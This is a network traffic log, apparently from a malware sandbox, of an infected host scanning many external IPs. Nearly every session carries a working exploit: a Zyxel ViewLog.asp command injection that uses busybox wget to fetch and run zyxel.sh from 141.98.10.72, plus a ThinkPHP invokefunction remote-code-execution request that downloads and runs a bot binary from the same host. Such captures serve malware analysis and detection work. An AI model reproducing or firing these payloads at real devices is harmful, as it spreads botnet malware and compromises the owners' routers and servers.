Feb 14, 2024 09:29:18.362451077 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:43.961838961 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.112390995 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.15	58362	31.131.88.24	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:57.058625937 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.15	51228	94.121.209.183	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:57.072876930 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.15	38716	94.120.212.218	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:57.076791048 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.15	42888	31.171.154.114	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:57.306459904 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:57.529320002 CET	405	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:28:57 GMT Content-Type: text/html Content-Length: 248 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.15	44846	94.123.38.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:57.330943108 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.15	51298	94.120.58.69	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:57.332884073 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.15	49864	31.220.18.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:57.413862944 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.15	49590	95.86.93.209	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:57.561548948 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.15	55624	95.100.53.49	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:57.744321108 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:57.954298019 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:28:57 GMT Date: Wed, 14 Feb 2024 08:28:57 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 64 66 39 30 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 33 37 26 23 34 36 3b 31 62 38 62 33 37 34 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.3df90a17.1707899337.1b8b374d</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.15	48710	31.136.173.240	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:58.255105019 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:01.466959953 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:07.610800982 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:19.642568111 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:43.961915970 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.112401962 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.15	60968	31.136.156.83	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:59.691554070 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:00.314960003 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:01.562922001 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:04.282888889 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:09.402818918 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:19.386471033 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:39.869829893 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:20.824793100 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.15	35498	94.121.147.198	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:59.937185049 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.15	54278	94.120.211.226	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:59.938929081 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.15	32934	85.9.71.154	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:59.984225035 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:00.284061909 CET	692	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:29:00 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.1.1b PHP/7.3.3 Vary: accept-language,accept-charset Content-Length: 438 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 62 20 50 48 50 2f 37 2e 33 2e 33 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 